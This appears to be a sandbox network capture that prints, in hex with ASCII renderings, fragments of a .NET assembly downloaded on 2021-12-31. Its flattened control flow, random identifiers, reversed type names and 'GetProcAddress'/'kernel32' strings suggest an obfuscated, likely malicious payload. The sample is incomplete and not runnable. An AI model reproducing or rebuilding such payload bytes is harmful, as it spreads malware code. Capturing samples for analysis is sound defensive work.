                                                                                                                                                                                                          2021-12-31 18:22:59 UTC44INData Raw: 00 00 00 20 7b 00 00 00 58 fe 0e 18 00 20 41 00 00 00 38 3f e4 ff ff 20 4f 00 00 00 20 70 00 00 00 58 fe 0e 14 00 20 10 00 00 00 28 76 01 00 06 3a 21 e4 ff ff 26 20 0c 01 00 00 38 16 e4 ff ff fe 0c 0d 00 20 1f 00 00 00 20 36 00 00 00 20 02 00 00 00 58 9c 20 83 00 00 00 38 f7 e3 ff ff fe 0c 01 00 20 04 00 00 00 20 af 00 00 00 20 3a 00 00 00 59 9c 20 5d 00 00 00 38 d8 e3 ff ff 20 2b 00 00 00 20 04 00 00 00 58 fe 0e 18 00 20 0a 00 00 00 28 75 01 00 06 39 ba e3 ff ff 26 20 10 00 00 00 38 af e3 ff ff fe 0c 0d 00 20 18 00 00 00 fe 0c 18 00 9c 20 76 00 00 00 38 97 e3 ff ff fe 0c 01 00 20 0d 00 00 00 fe 0c 1c 00 9c 20 a2 01 00 00 38 7f e3 ff ff fe 0c 0d 00 20 1e 00 00 00 fe 0c 18 00 9c 20 41 01 00 00 38 67 e3 ff ff fe 0c 01 00 20 03 00 00 00 20 bf 00 00 00 20 3f
                                                                                                                                                                                                          Data Ascii: {X A8? O pX (v:!& 8 6 X 8 :Y ]8 + X (u9& 8 v8 8 A8g ?
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC45INData Raw: 26 20 23 00 00 00 38 f2 de ff ff 20 5e 00 00 00 20 29 00 00 00 58 fe 0e 18 00 20 e4 00 00 00 38 d9 de ff ff fe 0c 01 00 20 07 00 00 00 20 55 00 00 00 20 73 00 00 00 58 9c 20 33 01 00 00 fe 0e 1f 00 38 b2 de ff ff fe 0c 01 00 20 08 00 00 00 20 06 00 00 00 20 4d 00 00 00 58 9c 20 51 00 00 00 28 76 01 00 06 39 92 de ff ff 26 20 28 00 00 00 38 87 de ff ff fe 0c 0d 00 20 13 00 00 00 fe 0c 18 00 9c 20 eb 00 00 00 38 6f de ff ff fe 0c 01 00 20 04 00 00 00 fe 0c 1c 00 9c 20 58 00 00 00 38 57 de ff ff fe 0c 01 00 20 0f 00 00 00 fe 0c 14 00 9c 20 95 01 00 00 fe 0e 1f 00 38 37 de ff ff 20 ff 00 00 00 13 24 20 5d 01 00 00 38 2a de ff ff fe 0c 01 00 20 03 00 00 00 fe 0c 14 00 9c 20 3a 00 00 00 28 76 01 00 06 3a 0d de ff ff 26 20 5a 00 00 00 38 02 de ff ff fe 0c 0d 00
                                                                                                                                                                                                          Data Ascii: & #8 ^ )X 8 U sX 38 MX Q(v9& (8 8o X8W 87 $ ]8* :(v:& Z8
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC47INData Raw: 00 58 fe 0e 14 00 20 e0 00 00 00 28 76 01 00 06 39 8f d9 ff ff 26 20 a7 00 00 00 38 84 d9 ff ff fe 0c 01 00 20 00 00 00 00 fe 0c 14 00 9c 20 a3 01 00 00 38 6c d9 ff ff 20 07 00 00 00 20 33 00 00 00 58 fe 0e 10 00 20 28 01 00 00 28 76 01 00 06 39 4e d9 ff ff 26 20 44 00 00 00 38 43 d9 ff ff 11 15 3a 17 0d 00 00 20 6c 01 00 00 38 32 d9 ff ff 7e 78 00 00 04 3a 2e eb ff ff 20 3d 01 00 00 38 1e d9 ff ff fe 0c 0d 00 20 11 00 00 00 20 75 00 00 00 20 25 00 00 00 58 9c 20 3b 00 00 00 28 76 01 00 06 3a fa d8 ff ff 26 20 84 01 00 00 38 ef d8 ff ff 11 02 16 3e b5 10 00 00 20 36 00 00 00 38 dd d8 ff ff fe 0c 0d 00 20 18 00 00 00 fe 0c 10 00 9c 20 79 01 00 00 28 75 01 00 06 3a c0 d8 ff ff 26 20 5f 00 00 00 38 b5 d8 ff ff 20 93 00 00 00 20 31 00 00 00 59 fe 0e 10 00 20
                                                                                                                                                                                                          Data Ascii: X (v9& 8 8l 3X ((v9N& D8C: l82~x:. =8 u %X ;(v:& 8> 68 y(u:& _8 1Y
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC48INData Raw: 1a 00 00 00 28 76 01 00 06 3a 3d d4 ff ff 26 20 15 01 00 00 38 32 d4 ff ff fe 0c 0d 00 20 09 00 00 00 fe 0c 18 00 9c 20 20 01 00 00 38 1a d4 ff ff fe 0c 0d 00 20 08 00 00 00 fe 0c 18 00 9c 20 b1 00 00 00 28 76 01 00 06 3a fd d3 ff ff 26 20 e2 00 00 00 38 f2 d3 ff ff fe 0c 0d 00 20 0d 00 00 00 20 db 00 00 00 20 49 00 00 00 59 9c 20 0d 01 00 00 28 75 01 00 06 3a ce d3 ff ff 26 20 dc 00 00 00 38 c3 d3 ff ff fe 0c 01 00 20 07 00 00 00 20 9b 00 00 00 20 25 00 00 00 58 9c 20 9a 01 00 00 38 a4 d3 ff ff 11 05 1a 5a 13 0f 20 08 01 00 00 fe 0e 1f 00 38 8c d3 ff ff 20 62 00 00 00 20 5f 00 00 00 58 fe 0e 10 00 20 85 00 00 00 38 77 d3 ff ff fe 0c 0d 00 20 03 00 00 00 fe 0c 10 00 9c 20 34 00 00 00 38 5f d3 ff ff fe 0c 0d 00 20 13 00 00 00 20 fb 00 00 00 20 53 00 00 00
                                                                                                                                                                                                          Data Ascii: (v:=& 82 8 (v:& 8 IY (u:& 8 %X 8Z 8 b _X 8w 48_ S
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC49INData Raw: fe 0c 0d 00 20 17 00 00 00 20 b3 00 00 00 20 3b 00 00 00 59 9c 20 07 00 00 00 28 76 01 00 06 3a ce ce ff ff 26 20 09 00 00 00 38 c3 ce ff ff fe 0c 0d 00 20 0c 00 00 00 fe 0c 18 00 9c 20 a7 00 00 00 28 75 01 00 06 39 a6 ce ff ff 26 20 d3 00 00 00 38 9b ce ff ff fe 0c 0d 00 20 1b 00 00 00 20 93 00 00 00 20 5e 00 00 00 59 9c 20 91 00 00 00 28 75 01 00 06 3a 77 ce ff ff 26 20 11 00 00 00 38 6c ce ff ff fe 0c 0d 00 20 1e 00 00 00 fe 0c 10 00 9c 20 f5 00 00 00 38 54 ce ff ff 20 0a 00 00 00 20 7b 00 00 00 58 fe 0e 18 00 20 d9 00 00 00 38 3b ce ff ff 20 6b 00 00 00 20 4f 00 00 00 58 fe 0e 10 00 20 88 01 00 00 38 22 ce ff ff 20 67 00 00 00 20 50 00 00 00 58 fe 0e 18 00 20 6a 01 00 00 38 09 ce ff ff 20 97 00 00 00 20 35 00 00 00 58 fe 0e 18 00 20 c7 00 00 00 38 f0
                                                                                                                                                                                                          Data Ascii: ;Y (v:& 8 (u9& 8 ^Y (u:w& 8l 8T {X 8; k OX 8" g PX j8 5X 8
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC51INData Raw: ff ff 20 77 00 00 00 20 5f 00 00 00 58 fe 0e 18 00 20 da 00 00 00 28 75 01 00 06 3a 79 c9 ff ff 26 20 72 00 00 00 38 6e c9 ff ff 38 44 f3 ff ff 20 06 00 00 00 38 5f c9 ff ff 20 2c 00 00 00 20 16 00 00 00 59 fe 0e 1c 00 20 f4 00 00 00 38 46 c9 ff ff fe 0c 0d 00 20 01 00 00 00 20 cd 00 00 00 20 44 00 00 00 59 9c 20 23 01 00 00 fe 0e 1f 00 38 1f c9 ff ff 11 13 1a 5a 13 19 20 f7 00 00 00 38 13 c9 ff ff fe 0c 0d 00 20 15 00 00 00 20 b0 00 00 00 20 3a 00 00 00 59 9c 20 c4 00 00 00 38 f4 c8 ff ff fe 0c 01 00 20 02 00 00 00 fe 0c 1c 00 9c 20 27 01 00 00 38 dc c8 ff ff 16 13 06 20 90 01 00 00 fe 0e 1f 00 38 c7 c8 ff ff 20 a5 00 00 00 20 37 00 00 00 59 fe 0e 18 00 20 1b 00 00 00 38 b2 c8 ff ff fe 0c 0d 00 20 1b 00 00 00 fe 0c 10 00 9c 20 f9 00 00 00 28 75 01 00 06
                                                                                                                                                                                                          Data Ascii: w _X (u:y& r8n8D 8_ , Y 8F DY #8Z 8 :Y 8 '8 8 7Y 8 (u
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC52INData Raw: 00 00 0a 0a 16 0b 38 21 00 00 00 7e 76 00 00 04 07 9a 06 28 8d 00 00 0a 39 0b 00 00 00 7e 77 00 00 04 74 36 00 00 01 2a 07 17 58 0b 07 7e 76 00 00 04 8e 69 3f d2 ff ff ff 14 2a 00 00 00 8a 02 28 09 00 00 0a 28 d1 00 00 0a 14 fe 06 64 01 00 06 73 d2 00 00 0a 6f d3 00 00 0a 28 60 01 00 06 2a 00 5e 7e 79 00 00 04 3a 0c 00 00 00 17 80 79 00 00 04 73 65 01 00 06 26 2a 7a 16 8d 08 00 00 01 80 76 00 00 04 14 80 77 00 00 04 16 80 78 00 00 04 16 80 79 00 00 04 2a 00 2e 00 fe 09 00 00 28 23 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3b 00 00 0a 2a 00 2a fe 09 00 00 6f 3b 01 00 06 2a 00 3a fe 09 00 00 fe 09 01 00 6f 37 00 00 0a 2a 00 2a fe 09 00 00 6f 3d 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 3c 01 00 06 2a 00 2e 00 fe 09 00 00 28 7f 01 00 06 2a 3a fe 09 00 00
                                                                                                                                                                                                          Data Ascii: 8!~v(9~wt6*X~vi?*((dso(`*^~y:yse&*zvwxy*.(#*:o;**o;*:o7**o=*:o<*.(*:
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC53INData Raw: 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: *0*0*0*0*0*0*0*0*0*0*0**0*0*0*0
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC57INData Raw: 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 22 00 14 a5 14 00 00 01 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 22 00 14 a5 14 00 00 01 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00
                                                                                                                                                                                                          Data Ascii: ******(**0**"***0**0*0******(**"*0*
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC61INData Raw: 0e 02 0e 00 0e 01 6f 27 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 91 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 2b 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 92 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 2f 05 00 06 2a 00 42 28 a9 00 00 06 d0 93 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 33 05 00 06 2a 00 42 28 a9 00 00 06 d0 94 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 37 05 00 06 2a 00 42 28 a9 00 00 06 d0 95 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 3b 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 96 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 3f 05 00 06 2a 00 42 28 a9 00 00 06 d0 97 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 43 05 00 06 2a 00 42 28 a9 00
                                                                                                                                                                                                          Data Ascii: o'*B((*2o+*B((*:o/*B((**o3*B((**o7*B((*2o;*B((**o?*B((**oC*B(
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC65INData Raw: 2d 00 1b 00 4b 00 02 01 00 00 b2 03 00 00 2d 00 1b 00 50 00 02 01 00 00 ed 03 00 00 2d 00 1b 00 55 00 02 01 00 00 1e 04 00 00 2d 00 1b 00 5a 00 02 01 00 00 50 04 00 00 2d 00 1b 00 5f 00 02 01 00 00 7c 04 00 00 2d 00 1b 00 64 00 02 01 00 00 a9 04 00 00 2d 00 1b 00 69 00 02 01 00 00 ea 04 00 00 2d 00 1b 00 6e 00 02 01 00 00 2c 05 00 00 2d 00 1b 00 73 00 02 01 00 00 5e 05 00 00 2d 00 1b 00 78 00 11 01 00 00 8b 05 00 00 31 00 1b 00 7d 00 11 01 00 00 df 05 00 00 31 00 1e 00 7d 00 11 01 00 00 0f 06 00 00 31 00 20 00 7d 00 11 01 00 00 42 06 00 00 31 00 21 00 7d 00 11 01 00 00 7f 06 00 00 31 00 24 00 7d 00 11 01 00 00 ad 06 00 00 31 00 29 00 7d 00 09 01 00 00 fe 06 00 00 31 00 2c 00 7d 00 09 01 01 00 2a 07 00 00 31 00 30 00 7d 00 01 01 00 00 5b 07 00 00 29 00 42
                                                                                                                                                                                                          Data Ascii: -K-P-U-ZP-_|-d-i-n,-s^-x1}1}1 }B1!}1$}1)}1,}*10}[)B
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC69INData Raw: 3f 6c 15 16 00 33 55 6f 0e 11 00 3d 55 6c 15 06 06 5b 3c f2 0e 06 06 5b 3c f2 0e 03 00 88 55 77 15 13 00 93 55 ef 10 06 00 7a 56 ec 01 06 00 85 56 f4 10 11 00 90 56 ba 15 06 00 f4 56 01 02 11 00 ff 56 d3 15 01 00 4f 57 e5 15 13 00 5a 57 5a 12 06 06 5b 3c 75 05 36 00 fc 3f 79 0e 16 00 f2 3f 6f 0e 13 00 d6 57 ec 01 33 01 12 58 06 16 33 01 53 58 0b 16 33 01 94 58 10 16 33 01 d5 58 e9 01 33 01 16 59 15 16 33 01 57 59 1a 16 33 01 98 59 0b 16 33 01 d9 59 1f 16 33 01 1a 5a 24 16 13 00 5b 5a 75 05 13 00 7e 5a 75 05 13 00 a1 5a 75 05 13 00 c4 5a 75 05 13 00 e7 5a 75 05 13 00 0a 5b 75 05 13 00 2d 5b 75 05 13 00 50 5b 75 05 13 00 73 5b 75 05 13 00 96 5b 75 05 13 00 b9 5b 75 05 13 00 dc 5b 75 05 13 00 ff 5b 75 05 13 00 22 5c 75 05 13 00 45 5c 75 05 13 00 68 5c 75 05
                                                                                                                                                                                                          Data Ascii: ?l3Uo=Ul[<[<UwUzVVVVVOWZWZ[<u6?y?oW3X3SX3X3X3Y3WY3Y3Y3Z$[Zu~ZuZuZuZu[u-[uP[us[u[u[u[u[u"\uE\uh\u
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC73INData Raw: 08 00 83 00 b8 30 b2 02 1b 01 a8 a6 00 00 08 00 83 00 c2 30 b2 02 1b 01 c8 a6 00 00 08 00 83 00 cc 30 b2 02 1b 01 d8 a6 00 00 08 00 83 00 d6 30 b2 02 1b 01 e8 a6 00 00 00 00 90 00 e0 30 5f 08 1b 01 ec a6 00 00 08 00 93 00 f4 30 50 0a 1b 01 fc a6 00 00 08 00 93 00 13 31 63 08 1b 01 0c a7 00 00 08 00 93 00 27 31 69 08 1b 01 1c a7 00 00 08 00 93 00 3b 31 82 08 1b 01 30 a7 00 00 08 00 93 00 4f 31 89 08 1b 01 44 a7 00 00 08 00 93 00 63 31 56 0a 1b 01 58 a7 00 00 08 00 93 00 82 31 74 08 1b 01 64 a7 00 00 08 00 93 00 96 31 5d 0a 1b 01 7c a7 00 00 08 00 93 00 aa 31 37 01 1b 01 84 a7 00 00 08 00 93 00 be 31 65 0a 1b 01 8c a7 00 00 08 00 93 00 e4 31 74 09 1b 01 98 a7 00 00 08 00 93 00 07 32 75 0a 1b 01 a4 a7 00 00 08 00 93 00 2b 32 7a 0a 1b 01 b8 a7 00 00 08 00 93
                                                                                                                                                                                                          Data Ascii: 00000_0P1c'1i;10O1Dc1VX1td1]|171e1t2u+2z
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC78INData Raw: 00 93 00 b4 44 a2 0f eb 01 1c f0 00 00 08 00 93 00 c8 44 74 09 eb 01 24 f0 00 00 08 00 93 00 dc 44 74 09 eb 01 2c f0 00 00 08 00 93 00 f0 44 c2 0a eb 01 34 f0 00 00 08 00 93 00 04 45 c2 0a eb 01 3c f0 00 00 08 00 93 00 18 45 c7 0a eb 01 44 f0 00 00 08 00 93 00 2c 45 c7 0a eb 01 4c f0 00 00 08 00 93 00 40 45 c7 0a eb 01 54 f0 00 00 08 00 93 00 54 45 c2 0a eb 01 5c f0 00 00 00 00 91 18 b9 16 37 01 eb 01 64 f0 00 00 08 00 c3 02 f9 40 07 0f eb 01 6c f0 00 00 08 00 c3 02 04 41 07 0f ec 01 74 f0 00 00 08 00 86 18 54 00 09 07 ed 01 7c f0 00 00 08 00 86 18 54 00 b5 0f ee 01 8c f0 00 00 08 00 c6 00 0f 41 1a 0f ef 01 94 f0 00 00 08 00 86 18 54 00 bc 0f ef 01 9c f0 00 00 08 00 86 18 54 00 c4 0f f1 01 a4 f0 00 00 08 00 86 18 54 00 c9 0f f2 01 ac f0 00 00 08 00 c6 00
                                                                                                                                                                                                          Data Ascii: DDt$Dt,D4E<ED,EL@ETTE\7d@lAtT|TATTT
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC82INData Raw: 84 18 54 00 d7 00 65 02 38 fa 00 00 08 00 93 00 4b 48 45 01 65 02 40 fa 00 00 08 00 93 00 5f 48 13 10 65 02 48 fa 00 00 00 00 91 18 b9 16 37 01 65 02 50 fa 00 00 08 00 c3 02 f9 40 07 0f 65 02 58 fa 00 00 08 00 c3 02 04 41 07 0f 66 02 60 fa 00 00 08 00 86 18 54 00 21 10 67 02 68 fa 00 00 08 00 86 18 54 00 26 10 68 02 78 fa 00 00 08 00 c6 00 0f 41 1a 0f 69 02 80 fa 00 00 08 00 86 18 54 00 2d 10 69 02 88 fa 00 00 08 00 86 18 54 00 35 10 6b 02 90 fa 00 00 08 00 86 18 54 00 3a 10 6c 02 98 fa 00 00 08 00 c6 00 1a 41 7e 01 6e 02 a0 fa 00 00 08 00 c6 00 25 41 7e 01 6e 02 a8 fa 00 00 08 00 c6 00 bb 2e 08 02 6e 02 b0 fa 00 00 08 00 c6 00 30 41 3b 0f 6e 02 c0 fa 00 00 08 00 c3 02 3b 41 4a 0f 6f 02 d0 fa 00 00 08 00 c6 00 51 41 5f 0f 70 02 d8 fa 00 00 08 00 c3 02 5c
                                                                                                                                                                                                          Data Ascii: Te8KHEe@_HeH7eP@eXAf`T!ghT&hxAiT-iT5kT:lA~n%A~n.n0A;n;AJoQA_p\
                                                                                                                                                                                                          2021-12-31 18:22:59 UTC86INData Raw: 18 b9 16 37 01 18 03 7c 07 01 00 08 00 86 18 54 00 d7 00 18 03 84 07 01 00 08 00 83 00 51 55 82 0e 18 03 8c 07 01 00 08 00 93 00 60 55 45 01 1a 03 94 07 01 00 08 00 93 00 74 55 71 15 1a 03 9c 07 01 00 08 00 86 18 54 00 d7 00 1a 03 a4 07 01 00 08 00 83 00 a7 55 7e 01 1a 03 ac 07 01 00 08 00 83 00 b2 55 7e 01 1a 03 b4 07 01 00 08 00 83 00 bd 55 7e 01 1a 03 bc 07 01 00 08 00 83 00 c8 55 7e 01 1a 03 c4 07 01 00 08 00 83 00 d3 55 7e 01 1a 03 cc 07 01 00 08 00 83 00 de 55 7e 01 1a 03 d4 07 01 00 08 00 c3 03 df 49 7e 01 1a 03 dc 07 01 00 08 00 c3 03 b8 46 7e 01 1a 03 00 00 00 00 00 00 c3 07 04 41 07 0f 1a 03 e4 07 01 00 08 00 c3 03 40 48 7e 01 1b 03 ec 07 01 00 08 00 83 18 54 00 7c 15 1b 03 00 00 00 00 00 00 c3 07 3b 41 4a 0f 1c 03 00 00 00 00 00 00 c3 07 27 44
                                                                                                                                                                                                          Data Ascii: 7|TQU`UEtUqTU~U~U~U~U~U~I~F~A@H~T|;AJ'D
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC90INData Raw: 6f 68 14 1b 36 03 00 00 00 00 03 00 06 18 54 00 65 01 36 03 f0 11 01 00 08 00 10 18 b9 16 37 01 36 03 00 00 00 00 03 00 46 00 14 18 24 1b 36 03 04 12 01 00 08 00 16 00 6f 68 2c 1b 36 03 00 00 00 00 03 00 06 18 54 00 65 01 36 03 14 12 01 00 08 00 10 18 b9 16 37 01 36 03 00 00 00 00 03 00 46 00 14 18 3c 1b 36 03 28 12 01 00 08 00 16 00 6f 68 44 1b 36 03 00 00 00 00 03 00 06 18 54 00 65 01 36 03 38 12 01 00 08 00 10 18 b9 16 37 01 36 03 00 00 00 00 03 00 46 00 14 18 54 1b 36 03 4c 12 01 00 08 00 16 00 6f 68 5c 1b 36 03 00 00 00 00 03 00 06 18 54 00 65 01 36 03 5c 12 01 00 08 00 10 18 b9 16 37 01 36 03 00 00 00 00 03 00 46 00 14 18 6c 1b 36 03 70 12 01 00 08 00 16 00 6f 68 74 1b 36 03 00 00 00 00 03 00 06 18 54 00 65 01 36 03 80 12 01 00 08 00 10 18 b9 16 37
                                                                                                                                                                                                          Data Ascii: oh6Te676F$6oh,6Te676F<6(ohD6Te6876FT6Loh\6Te6\76Fl6poht6Te67
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC94INData Raw: 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 04 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 04 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 04 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 20 04 00 a7 29 00 00 05 00 a7 29 00 00 06 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 04 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 03 00 03 00
                                                                                                                                                                                                          Data Ascii: )))))))))))))))))))))))) ))))))))))))))))))
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC97INData Raw: a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 10 10 03 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 03 00 a7 29 00 00 01 00 a7 29 00 00 01 00 a7 29 00 00 02 00 a7 29 00 00 02 00 8a 4f 00 00 03 00 8c 4f 00 00 04 00 8e 4f 00 00 01 00 5c 55 00 00 02 00 5e 55 00
                                                                                                                                                                                                          Data Ascii: ))))))))))))))))))))))))))))))))))))))OOO\U^U
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC101INData Raw: 00 02 00 00 00 b0 71 00 00 29 8f 01 00 02 00 00 00 d6 71 00 00 04 00 03 00 07 00 06 00 0a 00 09 00 0b 00 09 00 0f 00 0e 00 10 00 0e 00 11 00 0e 00 12 00 0e 00 13 00 0e 00 14 00 0e 00 15 00 0e 00 16 00 0e 00 17 00 0e 00 18 00 0e 00 19 00 0e 00 1a 00 0e 00 25 00 24 00 28 00 27 00 2a 00 29 00 2b 00 29 00 2c 00 2b 00 2d 00 29 00 2e 00 29 00 2f 00 29 00 30 00 29 00 31 00 29 00 32 00 29 00 33 00 29 00 34 00 29 00 35 00 29 00 36 00 29 00 37 00 29 00 38 00 29 00 3b 00 3a 00 3c 00 3a 00 3e 00 3d 00 3f 00 3d 00 40 00 3d 00 41 00 3d 00 42 00 3d 00 43 00 3d 00 44 00 3d 00 45 00 3d 00 46 00 3d 00 47 00 3d 00 48 00 3d 00 49 00 3d 00 4a 00 3d 00 4b 00 3d 00 4c 00 3d 00 4d 00 3d 00 4e 00 3d 00 4f 00 3d 00 50 00 3d 00 51 00 3d 00 52 00 3d 00 53 00 3d 00 54 00 3d 00 55 00
                                                                                                                                                                                                          Data Ascii: q)q%$('*)+),+-).)/)0)1)2)3)4)5)6)7)8);:<:>=?=@=A=B=C=D=E=F=G=H=I=J=K=L=M=N=O=P=Q=R=S=T=U
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC105INData Raw: 42 5a 00 4c 50 77 67 6b 72 75 70 66 51 75 6e 78 32 51 33 76 63 00 4d 55 4e 70 57 6d 33 51 47 6a 70 77 4a 6b 6c 30 4c 55 00 70 43 76 69 45 37 69 4a 62 64 57 41 77 57 4a 49 51 63 00 54 41 59 6f 39 50 49 66 70 31 70 34 67 77 56 66 48 66 00 73 46 32 43 67 67 4e 33 72 6f 32 73 69 65 31 6e 63 4b 00 6a 74 78 77 39 70 63 6c 6f 38 76 65 6b 69 43 71 36 31 00 74 6e 71 77 31 67 39 42 4f 6e 51 68 44 71 71 69 33 4d 00 56 5a 74 34 65 4f 77 47 58 35 4b 6b 43 41 4e 45 55 46 00 73 75 4d 36 30 68 4c 53 76 41 56 4f 42 41 52 52 4e 48 00 68 4a 74 52 5a 33 42 55 6f 35 6d 79 42 59 53 74 59 6f 00 68 35 32 37 46 74 61 6d 50 71 6d 68 6b 4f 48 59 4b 6e 00 6d 42 61 4b 48 59 7a 51 70 76 46 52 53 47 69 39 4d 78 00 6f 42 55 6d 64 61 46 46 46 6f 6b 32 57 61 46 79 33 55 6c 00 68 6c 57 53
                                                                                                                                                                                                          Data Ascii: BZLPwgkrupfQunx2Q3vcMUNpWm3QGjpwJkl0LUpCviE7iJbdWAwWJIQcTAYo9PIfp1p4gwVfHfsF2CggN3ro2sie1ncKjtxw9pclo8vekiCq61tnqw1g9BOnQhDqqi3MVZt4eOwGX5KkCANEUFsuM60hLSvAVOBARRNHhJtRZ3BUo5myBYStYoh527FtamPqmhkOHYKnmBaKHYzQpvFRSGi9MxoBUmdaFFFok2WaFy3UlhlWS
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC110INData Raw: 65 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 70 72 6f 63 4e 61 6d 65 00 6b 65 72 6e 65 6c 33 32 00 72 65 68 63 74 61 4d 78 69 66 65 72 50 69 72 55 73 75 6f 6d 79 6e 6f 6e 41 70 74 74 48 73 6c 65 6e 6e 61 68 43 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 32 34 30 37 31 00 74 53 69 36 6a 72 35 49 73 35 5a 65 42 74 57 6d 53 51 56 00 61 72 67 00 6c 61 69 74 6e 65 64 65 72 43 74 6e 65 69 6c 43 6e 65 6b 6f 54 64 65 75 73 73 49 79 74 69 72 75 63 65 53 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 32 35 31 31 30 00 72 65 64 6e 69 42 72 65 6e 65 74 73 69 4c 6e 6f 69 73 73 65 53 79 6c 70 65 52 72 65 64 6e 69 42 72 65 6e 65 74 73 69 4c 72 65 68 63 74 61 70 73 69 44 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 34 39 33 32 34 00 74 78
